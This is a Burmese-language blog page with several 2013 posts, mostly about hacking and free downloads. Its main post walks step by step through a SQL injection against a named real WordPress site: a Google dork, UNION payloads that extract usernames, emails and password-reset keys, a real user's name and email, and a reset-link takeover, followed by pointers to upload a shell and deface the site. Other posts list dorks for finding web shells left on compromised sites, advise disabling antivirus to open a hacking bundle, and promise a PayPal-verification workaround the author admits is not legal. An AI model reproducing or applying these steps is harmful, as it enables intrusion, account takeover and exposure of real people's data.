ဒီေကာင္ကေတာ့ gmail ေတြကုိ offline မွာ ဖတ္လုိ႔ရေအာင္ syn လုပ္ေပးပါတယ္။ attachment ေတြကုိ hard drive မွာတစ္ခါတည္းသိမ္းလုိ႔ရေအာင္ Setting ေတြခ်ိန္ထားလုိ႔ရပါတယ္။ Dropbox လုိေပါ့။ ကြ်န္ေတာ္ကေတာ့ ဒီနည္းလမ္းကုိသေဘာက်တယ္။ Setting ခ်ိန္တဲ့အခါ အရင္ဆုံး POP3 ကုိေရြးေပးရမွာျဖစ္ပါတယ္။ အဲဒါမွ email ေတြကုိ ကြန္ပ်ဴတာမွာ သိမ္းေပးမွာမုိ႔ပါ။ အေသးစိတ္ကုိေတာ့ ကုိယ့္ဘာသာကလိရင္ ရပါလိမ့္မယ္။ Thunderbird ကုိ http://www.mozilla.org/en-US/thunderbird/ မွာသြားေဒါင္းျပီး မိမိကြန္ပ်ဴတာရဲ႕ Email Client အျဖစ္အသုံးျပဳႏုိင္ပါလိမ့္မယ္။ 

ကြ်န္ေတာ္ ဒီပုိ႔စ္ကုိေရးရတဲ့အေၾကာင္းကေတာ့ apk တစ္ခုလုပ္တယ္ဗ်ာ။ ျဖစ္ခ်င္ေတာ့ ဒီရက္တြင္း Connection က စုတ္ျပတ္သတ္ေနပါတယ္။ 2 MB apk ေလးတစ္ခုကုိ mail ထဲကေနဘယ္လုိမွေဒါင္းမရဘူးျဖစ္ေနတယ္။ အဲဒါနဲ႔ ဒီနည္းလမ္းေလးနဲ႔ စမ္းၾကည့္ရင္း တစ္လက္စတည္းျပန္ရွယ္လုိက္တာပါ။  မၾကာခင္ ကြ်န္ေတာ္ဆုိဒ္ရဲ႕ Android apk ကုိတင္ေပးပါမယ္။ ဘာရယ္မဟုတ္ပါဘူး။ အဆင္ေျပၾကပါေစ။
Read more »

9/25/2013

Ankit Fadia Hacking Ebooks Collection

Hacking စာအုပ္ေလးေတြကုိ စုထားတဲ့ AIO Tool တစ္ခုပါ။ အထဲမွာပါတဲ့ Table Of Contents ကုိၾကည့္ျပီး စိတ္ဝင္စားတယ္ဆုိရင္ မသြားႏုိင္ပါျပီ။ AIO ျဖစ္တဲ့အတြက္ ေဒါင္းျပီး ဖုိင္ကုိဖြင့္မယ္ဆုိရင္ Antivirus ကုိေတာ့ ခဏပိတ္ထားဖုိ႔လုိပါလိမ့္မယ္။ အဆင္ေျပၾကပါေစ။
[Table of Contents]
Ankit Fadia Hackers Guide 
Untold windows Tips And Secrets 
Base 64 Encoding Torn Apart 
Batch File Programming 
Closing Open Holes Defacing Websites A Step By Step Process 
Dos Attacked 
Encryption Algorithms Explained 
Firewalls- How To Unblock It ?? 
FTP Exploits Gathering Info On Remote 
Host Hacking Into Linux Removing Banners From Your Site 

Download: Solidfiles Rghost

Read more »

9/23/2013

Between – app for couples 1.5.15

ဒီ apk ေလးကုိ တင္ေပးခ်င္တာၾကာပါျပီ။ ခ်စ္သူစုံတြဲေလးေတြ သုံးရမယ့္ apk ေလးျဖစ္ပါတယ္။ ဘယ္လုိလဲဆုိေတာ့ ႏွစ္ေယာက္ပဲသုံးလုိ႔ရမွာျဖစ္ပါတယ္။ Facebook လုိ status ေတြတင္လုိ႔ရမယ္။ chat, commemt, photo share ဘာညာဘာညာဆုိပါေတာ့။ ဒီေတာ့ အတြဲေလးေတြယူထားၾကေပါ့ေနာ္။ ကြ်န္ေတာ္က အတြဲမရွိေသးေတာ့ အေသးစိတ္မေျပာျပႏုိင္တာ နားလည္ေပးၾကပါ။ ဟီး။ Android version 2.2 အထက္ဆုိရင္သုံးလုိ႔ရပါျပီ။ ဖုိင္ဆုိဒ္ကလည္း သိပ္မၾကီးပါဘူး။ ကြ်န္ေတာ္ေဒါင္းရအဆင္ေျပေအာင္ zip ျပန္လုပ္ထားပါတယ္။ အဆင္ေျပပါေစ။


Download: Solidfiles Rghost
Read more »

9/22/2013

Wordpress Installation Guide in Localhost

ကြ်န္ေတာ္ wp ကုိ localhost ေပၚမွာတင္ျပီး test လုပ္ခ်င္တာ ဒီစာအုပ္နဲ႔ေတြ႕မွပဲအဆင္ေျပသြားတယ္။ မသိရင္ေတာ့ ဘယ္အရာပဲျဖစ္ျဖစ္ ေတာ္ေတာ္တုိင္ပတ္တာဗ်။ အခုေတာ့ ဒီစာအုပ္ေလးနဲ႔ဆုိရင္ အမ်ားၾကီးအဆင္ေျပသြားပါျပီ။ ဟက္ကင္းေလ့လာမယ့္သူမ်ားအေနနဲ႔ ဒီ wp platform ကုိရင္းႏွီးခ်င္ရင္ Localhost မွာအရင္ေလ့လာသင့္တယ္ထင္ပါတယ္။ အထဲက Dashboard ပုံစံေတြကုိ wp admin access ရမွာျမင္ရမွာကုိး။ ကုိယ္ဘာသာဝယ္ထားရင္ေတာ့ တမ်ဳိးေပါ့ဗ်ာ။ ကဲ ယူထားလုိက္ၾကရေအာင္။

Download: Solidfiles Mediafire

Credit: Technovilla
Read more »

Candy Crush Saga 1.15.1

မနက္အေစာၾကီးဆုိေတာ့ လူမရွိလုိ႔လားမသိပါဘူးဗ်ာ။ ကြန္နက္ရွင္က သိပ္မဆုိးတာနဲ႔ ေဒါင္းျပီး ျပန္တင္ေပးလုိက္ပါတယ္။ ေတာင္ထားတဲ့သူတစ္ေယာက္အတြက္ပါ။ ကြ်န္ေတာ္ကေတာ့ ဒီလုိဂိမ္း တစ္ခါမွမေဆာ့ျဖစ္ေတာ့ ဘယ္လုိေဆာ့ရတယ္ဆုိတာမသိပါဘူး။ ဖုိင္ဆုိဒ္က 40 MB ရွိပါတယ္။ ေဒါင္းရလြယ္ေအာင္ ျပန္ခ်ဳံ႕ထားပါတယ္။ ေဒါင္းျပီးရင္ေတာ့ WinRAR နဲ႔ ျပန္ျပီး extract လုပ္လုိက္ေပါ့ေနာ္။ ျပီးရင္ Android မွာသြင္းျပီးေဆာ့ႏုိင္ပါျပီ။ ဗားရွင္း 1.1 အထက္လားမသိဘူး။ ေဆာ့လုိ႔ရတယ္ဆုိေတာ့ အဆင္ေျပမွာပါ။ အဆင္ေျပပါေစဗ်ာ။

Download: Mediafire
Read more »

Myanmar IP ျဖင္႔သာ Verifyျဖစ္ေသာ PayPal ျပဳလုပ္အသံုးျပဳနည္း ထြက္မည္ဟုသတင္းရရွိ

အားလံုးပဲ မဂၤလာပါခဗ်ာ.. 

ကြ်န္ေတာ္ ျမန္မာႏိုင္ငံကေန မည္သည့္ Proxy မွ မသံုးပဲ Myanmar IP နဲ႔ Verify ျဖစ္တဲ႔ Pay Pal အေကာင္႔ကို ေျပာျပမယ္လို႔ ကတိေပးခဲ႔ပါတယ္။

ကြ်န္ေတာ္ အခု မၾကာခင္ အခ်ိန္အတြင္း မွာ Myanmar IP နဲ႔ ပဲ Verify ျဖစ္တဲ႔ PayPal အေကာင္႔ ရေအာင္လုပ္နည္းေျပာျပပါေတာ႔မယ္။ 

ကြ်န္ေတာ္ ကိုယ္တိုင္ အခုလက္ရွိသံုးေနတာျဖစ္သလို ၆လ ေက်ာ္၊ သြားျပီလဲ။ ကြ်န္ေတာ္ ဒီနည္းကို ရဖို႔ $100 နည္းပါး  စမ္းသပ္ရင္းနဲ႔ ကုန္က် ခဲ႔ပါတယ္။ ကြ်န္ေတာ္႔ကို  အဲ႔အတြက္ ShweMoney Company က Sponsor အေနနဲ႔ $50 ထုတ္ေပးခဲ႔သလို ကြ်န္ေတာ္ အဲ႔ဒီ $50 ကိုလည္း ကိုယ္က်ိဳး မၾကည့္ပဲ PayPal စမ္းသပ္တဲ႔ အထဲထည့္ခဲ႔ပါတယ္။

ဒီနည္းကို မည္သည့္ေနရာကမွ Clone ရိုက္ထားျခင္း မရွိသလို Copy ကူးထားျခင္း မရွိပါဘူး။ Idea ပင္ Copy ကူးထားျခင္းမရွိပါဘူး လို႔ ေျပာၾကားလိုပါတယ္။ Myanmar IP နဲ႔ Verify ျဖစ္တဲ႔ Pay Pal အေကာင္႔ လုပ္နည္းရွာ စိတ္ကူးရွိလာတာက ေတာ႔

ကြ်န္ေတာ္႔ Proxy နဲ႔ အသံုးျပဳေနတဲ႔ Verify လုပ္ျပီးျဖစ္တဲ႔ PayPal အေကာင္႔ ႏွစ္ခု Lock က်ျပီး စိတ္ဆင္းရဲရာက စခဲ႔ပါတယ္လို႔ ၀န္ခံ ေျပာၾကား လိုက္ပါရေစ။

ဒီနည္းလမ္းဟာ ျမန္မာ ျပည္သူ ျပည္သား အားလံုးအတြက္ အက်ိဳးရွိမယ္လို႔ ေမွ်ာ္လင္႔ပါတယ္။ Myanmar IP နဲ႔ Verify ျဖစ္တဲ႔ Pay Pal ျပဳလုပ္နည္း တင္ျပရျခင္းရည္ရြယ္ခ်က္ကေတာ႔ ျမန္မာ႔ စီးပြားေရးကို တစ္ဖက္တစ္လွမ္းက တိုးတက္ ေကာင္းမြန္ေစခ်င္တဲ႔ ရည္ရြယ္ခ်က္ေၾကာင္႔ပါ။

PayPal က တရား၀င္ ခြင္႔ျပဳထားတာ မဟုတ္ေသာ္လည္း Online ေပၚမွာ ဘာမွ အက်ိဳးမရွိ အခ်ိန္ကုန္ေနမဲ႔ အစား Online ေပၚကေန စီးပြားေရး အဆင္ေျပေျပလုပ္ႏိုင္ပါေစ ဆိုတဲ႔ ရည္ရြယ္ခ်က္နဲ႔ ပဲျဖစ္ပါတယ္။ ကြ်န္ေတာ္ တစ္ေယာက္တစ္ေယာက္ထဲ သိျပီး မိမိကိုယ္တိုင္ လုပ္ေနလဲ ရပါတယ္။ 

ဒါေပမဲ႔ အားလံုးကို အဆင္ေျပပါေစ ၊ ဆိုတဲ႔ ရည္ရြယ္ခ်က္နဲ႔ ဒီနည္းလမ္းကို အခ်ိန္ၾကာျမင္႔ေအာင္ ေရးသား ေျပာၾကားလိုက္ရပါတယ္။


PayPal account ရျပီဆိုတာနဲ႔ သင္ဟာ ေငြလက္ခံရရွိႏိုင္ပါျပီလို႔ ေျပာၾကားလိုက္ပါရေစ.. PayPal မွာ ေငြရွိလာျပီး ဆိုရင္ PayPal ကေန ျမန္မာ ႏိုင္ငံဘဏ္ကေန ေငြထုတ္ဖို႔ ေျပာၾကားေပးသြားဦးမွာျဖစ္ပါတယ္။ အားလံုးပဲ စိတ္အားထက္သန္စြာဖတ္ရွဳ ႏိုင္ပါတယ္။

ကြ်န္ေတာ္အေနနဲ႔ ႏိုင္ငံ အားျဖင္႔ Thai,Malaysia,Singapore,US စတဲ႔ ႏိုင္ငံေတြကို ကို ျမန္မာႏိုင္ငံ IP နဲ႔ ၀င္ေရာက္ ျပီး စမ္းသပ္ခဲ႔ပါတယ္။ အဲ႔ထဲမွာမွ Thai နဲ႔ Malay က Myanmar IP နဲ႔ ၀င္ေရာက္ အသံုးျပဳလို႔ ရခဲ႔ပါတယ္။ ဒါေပမဲ႔ ကြ်န္ေတာ္ Myanmar IP ကို အသံုးျပဳ ျပီး Credit Card ခ်ိတ္ၾကည့္တဲ႔ အခါမွာ Thai ေရာ Malay ေရာဟာ Location Confirm ခိုင္းတဲ႔ ျပႆနာ တက္ျပီး အေကာင္႔ ေတြ Suspend ဆိုျပီး Lock က် ကုန္ပါတယ္။အဲ႔လိုနဲ႔ စိတ္ဆင္းရဲ စြာနဲ႔ လိုက္ရွာရင္း ေနာက္ဆံုး မွာ ကြ်န္ေတာ္ ႏိုင္ငံ တစ္ႏိုင္ငံကို ေတြ႔ ခဲ႔တယ္။ အဲ႔ႏိုင္ငံက စမ္းလုပ္ ၾကည့္ေတာ႔ အဆင္ေျပတာ ကို ေတြ႔ ရျပီး ေနာက္ဆံုးမွာ အခုထိ Lock မက် ပဲ Myanmar IP နဲ႔ပဲ Verify ျဖစ္တဲ႔ အေကာင္႔ကို ရယူ ပိုင္ဆိုင္ခဲ႔ပါတယ္။

ကြ်န္ေတာ္ တစ္ခု ၾကိဳမွာ ထားခ်င္တာကေတာ႔ ျမန္မာ ႏိုင္ငံကေန Pay Pal ကို အသံုးျပဳဖို႔ PayPal က ခြင္႔ျ႔ပဳထားျခင္း မရွိတဲ႔ အတြက္ ဒီနည္းလမ္းဟာ Legal ျဖစ္မွာ မဟုတ္ပါဘူး။ တကယ္လို႔ Policy Updates ေၾကာင္႔ အေၾကာင္းတစ္ခုခု ျဖစ္ပ်က္ခဲ႔ပါက ကြ်န္ေတာ္ ကယ္တင္ႏိုင္မွာ မဟုတ္ပါဘူး။

Myanmar IP နဲ႔ Verify ျဖစ္တဲ႔ PayPal ရေအာင္ ကြ်န္ေတာ္႔ အေတြ႔ အၾကံဳ နဲ႔ ျပန္လည္ ကူညီေပးျခင္းသာျဖစ္ပါတယ္။ ထို႔ေၾကာင္ ဒီနည္းလမ္းကို ကြ်န္ေတာ္႔ အၾကံျပဳခ်က္အတိုင္း အသံုးျပဳေစခ်င္ပါတယ္။ အကယ္လို႔ မိမိစိတ္ၾကိဳက္ လုပ္မယ္ဆိုပါက Make Your Own Risk လို႔သာ ေျပာၾကားပါရေစ။


အေၾကာင္း တစ္ခု ျဖစ္ပ်က္ခဲ႔ပါက ကြ်န္ေတာ္ အၾကံေပးရံုသာ တတ္ႏိုင္မွာျဖစ္ပါတယ္။

အခု ကြ်န္ေတာ္ Myanmar IP နဲ႔ ျဖစ္ေပမဲ႔ Verify ျဖစ္တဲ႔ Pay Pal ကို ရယူ အသံုးျပဳနည္းကို ေျပာျပေပးသြားမွာပါ။

Myanmar IP နဲ႔ Verify ျဖစ္တဲ႔ Pay Pal ကို ရယူ အသံုးျပဳနည္း ဖတ္ရွဳ ဖို႔ ေအာက္ပါအခ်က္မ်ားကို သေဘာတူညီ ေပးဖို႔လိုပါတယ္။

1) ကြ်ႏွဳပ္သည္ Myanamr IP ျဖင္႔သာ Verify ျဖစ္ေသာ PayPal အေကာင္႔ ရယူ အသံုးျပဳနည္းကို ဖတ္ရွဳလိုသည္။

2) လမ္းညႊန္ခ်က္ကို အျပည့္အစံု ေသခ်ာစြာဖတ္ရွဳပါမည္။ ျပဳလုပ္နည္းမွ ညႊန္ၾကားခ်က္မ်ားကို သတိထားလိုက္နာမည္ ဟု ကတိေပးပါသည္။

3) ျမန္မာႏိုင္ငံမွေနျပီး Verify ျဖစ္ေသာ PayPal အေကာင္႔ ရယူ အသံုးျပဳနည္း ႏွင္႔ ပတ္သက္ျပီး အခ်ိန္မေရြး ေျပာင္းလဲ ေသာ ညႊန္ၾကားခ်က္မ်ားကို လိုက္နာပါမည္။

4) စာေရးသူသည္ သူတစ္ပါးအား ေစတနာျဖင္႔ ေျပာၾကားေပးျခင္းျဖစ္သည္။ ကြ်ႏွဳပ္ စာေရးသူ၏ ေစတနာကို နားလည္ပါသည္။ အေၾကာင္း တစ္ခုခု ျဖစ္ပ်က္ခဲ႔ပါက သူ႔ကို အျပစ္ေျပာမည္မဟုတ္ဘဲ သူ႔ထံမွ အၾကံဥာဏ္ အကူအညီ ရယူမည္ဟု ကတိေပးပါသည္။


အားလံုးပဲ သေဘာတူတယ္ဆိုရင္ Comment ေပးထားပါ။ ေနာက္ျပီး ဆက္လက္ မဲ႔ PayPal အေကာင္႔ ျပဳလုပ္နည္း အတြက္ သေဘာတူတဲ႔ သူေတြ ပဲ ကြ်န္ေတာ္႔ အေနနဲ႔ ဖတ္ခြင္႔ ေပးမွာ ျဖစ္ျပီး အခ်က္ကို မလိုက္နာ ႏိုင္တဲ႔ သူ မ်ားအား တစ္စံုတစ္ရာညႊန္ၾကား ေျပာဆိုမွာ မဟုတ္ပါဘူး။

မၾကာခင္ ကြ်န္ေတာ္ Myanmar IP ျဖင္႔သာ Verifyျဖစ္ေသာ PayPal ျပဳလုပ္ အသံုးျပဳနည္း တင္ေပးသြားပါ႔မယ္။


မိမိထံ Mail ေရာက္ခ်င္ရင္ေတာ႔ http://www.techmilo.tk မွာ member ၀င္ထားျပီးေတာ႔ ျဖစ္ျဖစ္ ၊ email subscirbe လုပ္ျပီးေတာ႔ပဲ ျဖစ္ျဖစ္ လုပ္ထားႏိုင္ပါတယ္။

email - fullpremiumnowfree@gmail.com
         - contact@shwemoovi.com

Facebook - https://www.facebook.com/TechMilo  
              - https://www.facebook.com/FPNFOfficial

From Official Team ,
Steel Jelly [Miloboy Inc.]
Chief Editor Of Full Premium Now Free
Founder Of Tech Milo : Online Magazine
Read more »

How to Hack Wordpress Site

WP ကုိ ဟက္ခ်င္ပါတဲ့ဆုိတဲ့ညီအကုိမ်ားအတြက္ ဒီပုိ႔စ္ေလးကအေထာက္အကူျပဳမယ္ထင္ပါတယ္။ ဒီပုိ႔စ္ကနည္းအတုိင္းမလုပ္ခင္ SQL Injection အေၾကာင္းနည္းနည္းပါးပါးနားလည္ရင္ေတာ့ ေကာင္းမယ္ဗ်။ ဘာလုိ႔လဲဆုိေတာ့ ကြ်န္ေတာ္ကုိနည္းေျပာျပေနတဲ့အခ်ိန္မွာ မလုပ္ဖူးေတာ့ ေတာ္ေတာ္ေခါင္းစားလုိ႔ပါ။ အေျခမခုိင္ေတာ့ ဟီး ကဲဗ်ာ ဒီေန႔ေတာ့ ကြ်န္ေတာ္ ဆရာတစ္ေယာက္ေျပာျပတဲ့နည္းကုိ ျပန္ရွယ္ေပးလုိက္ပါတယ္။ wp ကုိဟက္ခ်င္တယ္ေျပာတဲ့ ညီအကုိမ်ားအတြက္ပါ။ (မ်ဳိးၾကီးေလသံျဖင့္ :D) ဒီေတာ့ ကြ်န္ေတာ္တုိ႔ vul ျဖစ္ေနတဲ့ ဆုိဒ္ေတြကုိရွာရပါမယ္။ ဒီေတာ့ Google မွာေအာက္က Dork ေလးနဲ႔အရင္ရွာလုိက္ပါ။

Dork: inurl:"fbconnect_action=myhome"



ကဲ အဲဒီလင့္ေတြအမ်ားၾကီးထဲမွာ 10,7,6 ဆုိတာပါရင္ SQL Vul ျဖစ္ေနတဲ့ဆုိဒ္ျဖစ္ပါတယ္။ လင့္ေတြကုိဝင္ၾကည့္ျပီးရွာၾကည့္ေပါ့ေနာ္။ကြ်န္ေတာ္နမူနာျပထားတဲ့ဆုိဒ္ကုိ ေအာက္မွာေသခ်ာၾကည့္လုိက္ပါ။

sqli =>
site.com/fbconnect_action=myhome&fbuserid=0+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12--   In My case,
http://www.wildwind.it/?fbconnect_action=myhome&fbuserid=0+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12--

ဟုတ္ျပီဗ်ာ။ ဝုိင္းထားတဲ့ေနရာမွာ ကြ်န္ေတာ္တုိ႔ရွာေနတဲ့ vul နဲ႔ကုိက္ပါျပီ။ ဒါက SQL ေပါက္ေနတာပါ။

Stato:
Nome: 10
Membro da: 7
Website URL: 6


ကဲ ေနာက္တစ္ဆင့္ကေတာ့ table prefix ကုိစစ္မယ္ဗ်ာ။ အသုံးျပဳရမယ့္ဟာကေတာ့

sqli=>
site.com/?fbconnect_action=myhome&fbuserid=0+and+1=2+union+select+1,2,3,4,5,6,7,8,9,group_concat(table_name),11,12+from+information_schema.tables+where+table_schema=database()--

ျဖစ္ပါတယ္။ In my case, http://www.wildwind.it/?fbconnect_action=myhome&fbuserid=0+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12--  ဒီေနရာမွာ http://www.wildwind.it/?fbconnect_action=myhome&fbuserid=0+and+1=2+union+select+1,2,3,4,5,6,7,8,9,group_concat(table_name),11,12+from+information_schema.tables+where+table_schema=database()--   ဒီလုိေလးအစားထုိးေပးလုိက္တာေပါ့ေနာ္။ ဒါဆုိရင္ ေအာက္ကလုိေတြ႕ရပါမယ္။


ဒါဆုိရင္ အေပၚက ပုံမွာျပထားတဲ့အတုိင္း wp_ prefix ေတြကုိ ip2nation,ip2nationCountries,wp_Counterize,wp_Counterize_Keywords,wp_Counterize_Pages ဝုိင္းထားသလုိမ်ဳိးျမင္ေနရပါျပီ။ ဒီအဆင့္ထိေအာင္ျမင္ျပီဆုိ ေနာက္တစ္ဆင့္ကုိသြားမယ္ဗ်ာ။

sqli =>
site.com/?fbconnect_action=myhome&fbuserid=0+and+1=2+union+select+1,2,3,4,5,6,group_concat(ID,0x3a,user_login,0x3a,user_activation_key,0x3a,user_email),8,9,10,11,12+from+wp_users--

ဒီေတာ့ ကြ်န္ေတာ္တုိ႔ ဒီလုိေလးအစားထုိးျပီး ေခၚၾကည့္လုိက္မယ္။ In my case, http://www.wildwind.it/?fbconnect_action=myhome&fbuserid=0+and+1=2+union+select+1,2,3,4,5,6,group_concat%28ID,0x3a,user_login,0x3a,user_activation_key,0x3a,user_email%29,8,9,10,11,12+from+wp_users--   ဒါကေတာ့ အဲဒီဆုိဒ္မွာရွိတဲ့ username, email address ကုိလွမ္းျပီးႏွိက္ၾကည့္တဲ့ SQL တစ္ခုေပါ့ေနာ္။ ဒါဆုိရင္ ဆုိဒ္မွာ သုံးထားတဲ့ username, email address ကုိေတြ႕ရပါျပီ။ ဒါကုိခဏမွတ္ထားေပးပါ။ ေနာက္တစ္ခါျပန္သုံးရမွာမုိ႔ပါ။


Stato:
Nome: 10
Membro da: 2:Rudy::r.checchin@gmail.com
Website URL: 6

ဒီေတာ့ Username က Rudy, email address က  r.checchin@gmail.com ဆုိျပီးသိရပါျပီ။ေနာက္တစ္ဆင့္သြားမယ္ဗ်ာ။ အဲဒီဆုိဒ္ရဲ႕ admin login panel ကုိသြားပါ။ ျပီးရင္ password ေမ့သြားပါတယ္ဆုိျပီး Request လုပ္လုိက္မယ္။ http://www.wildwind.it/wp-admin/


ဒါဆုိရင္ Password Forget တဲ့အတြက္ Recover ျပန္လုပ္ဖုိ႔ သူက သက္ဆုိင္ရာ email ဆီ activate လုပ္ဖုိ႔ျပင္ဆင္ပါလိမ့္မယ္။ ဒီေတာ့ ခုနက ကြ်န္ေတာ္တုိ႔ရထားတဲ့ email နဲေအာက္လုိျဖည့္ေပးျပီး Enter ေခါက္ေပးလုိက္ေပါ့ဗ်ာ။ ကဲ လာျပီ။ ေနာက္တစ္ခု။


ျပီးရင္ ေအာက္ကပုံအတုိင္းေတြ႕ရပါမယ္။ Box ႏွစ္ခုလုံးမွာ ဘာမွမေရးဘဲ ခဏခ်န္ထားလုိက္ပါ။



http://www.wildwind.it/?fbconnect_action=myhome&fbuserid=0+and+1=2+union+select+1,2,3,4,5,6,group_concat%28ID,0x3a,user_login,0x3a,user_activation_key,0x3a,user_email%29,8,9,10,11,12+from+wp_users-- ျပီးရင္ ေစာေစာက မွတ္ထားတာေလး ျပန္ၾကည့္မယ္။ အဲဒီမွာ user name က Rudy, Activation key က hSTGEM9iWvnryRgJL6tz   ျဖစ္ပါတယ္။


ဒီေတာ့ username, activation key ကုိ ဒီေနရာေလးမွာ အစားထုိးေပးရမွာျဖစ္ပါတယ္။

http://www.wildwind.it/wp-login.php?action=rp&key=key&login=username

ဒါဆုိရင္ ေအာက္ကအတုိင္း ျဖစ္သြားမွာပါ။


www.wildwind.it/wp-login.php?action=rp&key=hSTGEM9iWvnryRgJL6tz&login=Rudy

အဲဒီမွာ ကုိယ္လုိခ်င္တဲ့ password ရုိက္ထည့္ေပးရုံပါပဲ။ ထုံးစံအတုိင္းႏွစ္ခါမွန္ေအာင္ရုိက္ေပးလုိက္ပါ။



ဒါဆုိရင္ ေအာက္ကလုိ Accept ျဖစ္သြားပါမယ္။


ကဲ ေနာက္ဆုံးအဆင့္ေရာက္ပါျပီ။ wp-admin ကုိျပန္သြားျပီး ခုနက ကြ်န္ေတာ္တုိ႔ေပးထားတဲ့ password အသစ္နဲ႔ login ဝင္ႏုိင္ပါျပီ။ username က Rudy ေနာ္။ http://www.wildwind.it/wp-admin


Bravo! I'm in :D


ကဲ ဒါဆုိရင္ေတာ့ shell တင္မယ္။ ေနာက္ Deface တင္လုိ႔ရပါျပီ။ shell တင္နည္းကုိေတာ့ ဒီ မွာျပန္ၾကည့္ႏုိင္ပါတယ္။  Deface တင္နည္းကုိလည္း ဒီ မွာၾကည့္ႏုိင္ပါတယ္။ အဆင္ေျပၾကပါေစ။


Special Thanks to: $0m30n3 (BMH)
Read more »

9/21/2013

What is Defacement?

Deface ဆုိတာဘာလဲ?

Hacking ေလာကထဲကုိဝင္လာတဲ့ လူသစ္ေတြအေနနဲ႔ Deface ဆုိတာဘာမွန္းမသိေသးတာေတြ႕လုိ႔ ဒီပုိ႔စ္ကုိေရးဖုိ႔စိတ္ကူးရလာလုိ႔ပါ။ ဆရာသမားေတြ အေနနဲ႔ ေက်ာ္ဖတ္သြားၾကပါ။ ဟီး။ ဟုတ္ကဲ့ Deface တင္တယ္ဆုိတာ Website တစ္ခုရဲ႕ Home Page ကုိ ကုိယ္လုိခ်င္တဲ့ စာသား ဒါမွမဟုတ္ Logo ပုံေတြ
အစားထုိးလုိက္တာလုိ႔ အၾကမ္းဖ်င္း သတ္မွတ္ႏုိင္ပါတယ္။ ဆုိဒ္တစ္ခုမွာ Home page ဆုိတာရွိပါတယ္။ Home page ဆုိတာကေတာ့ ဆုိဒ္တစ္ခုရဲ႕ မူလစာမ်က္ႏွာဆုိရမွာေပါ့ဗ်ာ။ ဥပမာ www.someone.com/index.html ဆုိတဲ့ ဆုိဒ္တစ္ခုမွာ index.html ဆုိတာ အဲဒီဆုိဒ္ရဲ႕ home page ျဖစ္ပါတယ္။ အဲဒီ index.html ဆုိတဲ့ page ကုိ ဟတ္ကာေတြရဲ႕ page နဲ႔အစားထုိးေပးလုိက္တာပါ။ ဒီေတာ့ အဲဒီဆုိဒ္ကုိေခၚၾကည့္လုိက္တာနဲ႔ Deface လုပ္ထားတဲ့ စာမ်က္ႏွာကုိပဲျမင္ရမွာျဖစ္ပါတယ္။ ေျပာရမယ္ဆုိရင္ေတာ့ ဟတ္ကာေတြ သူတုိ႔ Security ကုိထုိးေဖာက္ႏုိင္ခဲ့ေၾကာင္း ျပထားတဲ့ အမွတ္အသားတစ္ခုလုိ႔ဆုိရမွာေပါ့ဗ်ာ။ Deface page ေတြဆုိရင္ Joker ပုံေတြ၊ သရဲပုံေတြ၊ ေနာက္ေျပာင္ထားထားတဲ့ပုံေတြ၊ ဒါမွမဟုတ္ Team တစ္ခုရဲ႕ Logo, Message အစရွိသည္ျဖင့္
ေတြ႕ရမွာပါ။ ေနာက္ အဲဒီဆုိဒ္ကုိဟတ္ခဲ့တဲ့ဟတ္ကာရဲ႕ Nick Name ကုိလည္းေတြ႕ရမယ္ျဖစ္ပါတယ္။ 

Why Deface?

ဘာျဖစ္လုိ႔ Deface တင္ရတာလဲဆုိတာ အေၾကာင္းျပခ်က္အမ်ဳိးမ်ဳိးရွိေပမယ့္ အေရးၾကီးဆုံး Reason ကေတာ့ ဟက္ကာေတြရဲ႕ ဘယ္လုိမွတားဆီးလုိ႔ရမွာမဟုတ္တဲ့ Security ကုိ test လုပ္ခ်င္တဲ့စိတ္ပါပဲ။ အဲဒီစိတ္ကုိေတာ့ ဘယ္လုိမွတားဆီးလုိ႔ရမွာမဟုတ္ပါဘူး။ "You can divide us individual, but you cannot divide us at all" ဒါကေတာ့ ဟက္ကာေတြခံယူထားတဲ့ Mindset တစ္ခုပါပဲ။ ေနာက္ Deface ဆုိတာ အဖြဲ႕စည္းတစ္ခုကုိ ၾကည့္မရတဲ့အခါ၊ ဟက္ကာေတြရဲ႕ပစ္မွတ္ခံရတဲ့အခါ၊ ဆုိဒ္တစ္ခုက Vul (ယုိေပါက္) ေတြရွိတဲ့အခါ ဒီလုိေတြမွာ Deface ဆုိတာရွိေနမွာပါ။ ေနာက္ Political သေဘာအရလည္း Deface ေတြဆုိတာရွိပါတယ္။ ႏုိင္ငံအခ်င္းခ်င္း ဟက္ကာေတြအျပိဳင္ Deface လုပ္ၾကပါတယ္။ ဒီလုိဆုိရင္ေတာ့ ရွဳံးဆုံးမွဳကပုိမ်ားေတာ့မွာပါ။ Cyber War အဆင့္ကုိသတ္မွတ္ႏုိင္ပါတယ္။ Deface page ေတြကုိ www.hack-db.com, www.hack-mirror.com လုိဆုိဒ္မ်ဳိးမွာသြားျပီးေလ့လာၾကည့္ႏုိင္ပါတယ္။ အဲဒီမွာ ဟက္ကာေတြဟတ္ခဲ့တဲ့ mirror page ေတြကုိ သိမ္းထားေပးပါတယ္။ အဲဒီမွာဆုိရင္ Team ေတြကုိလည္း စုံစုံလင္လင္ေတြ႕ရမွာျဖစ္သလုိ Deface page နမူနာေတြကုိလည္း အမ်ားၾကီးေတြ႕ရမွာပါ။ ဒီေလာက္ဆုိရင္ Deface ဆုိတာကုိ သေဘာေပါက္သြားလိမ့္မယ္လုိ႔ ေမ်ာ္လင့္ပါတယ္။ 

Ref: Google :D

Read more »

Finding Shell Left Behind By Stupid Hackers

ဟုတ္မဟုတ္ေတာ့ မသိပါဘူး။ စမ္းၾကည့္ရေအာင္ဘေလာ့တစ္ခုကေန ျပန္ရွယ္လုိက္ပါတယ္။ shell တင္ထားျပီးသားဆုိဒ္ေတြကုိ ရွာတာေပါ့ေနာ္။ တစ္ခ်ဳိ႕ဟက္ကာေတြက မူရင္း shell နာမည္နဲ႔ပဲတင္ထားတတ္ၾကပါသတဲ့။ ဒီေတာ့ 404 လုိ password protected မလုပ္ထားတဲ့ shell ေတြသာဆုိ ကြ်န္ေတာ္တုိ႔လည္း သူတင္ထားတဲ့ shell ကုိ access ရေနပါလိမ့္မယ္။ ေအာက္က dork ေလးေတြနဲ႔ ကလိႏုိင္ပါျပီ။ မရလည္း အရင္းပဲဆုိေတာ့ စမ္းၾကည့္ေပါ့ဗ်ာ။ ဟီး

C99 Shells
inurl:c99.php uid=0(root)
root c99.php
"Captain Crunch Security Team" inurl:c99
inurl:c99.php
allinurl: c99.php
inurl:"c99.php" c99shell
inurl:c99.php uid=0(root)
c99shell powered by admin
c99shell powered by admin
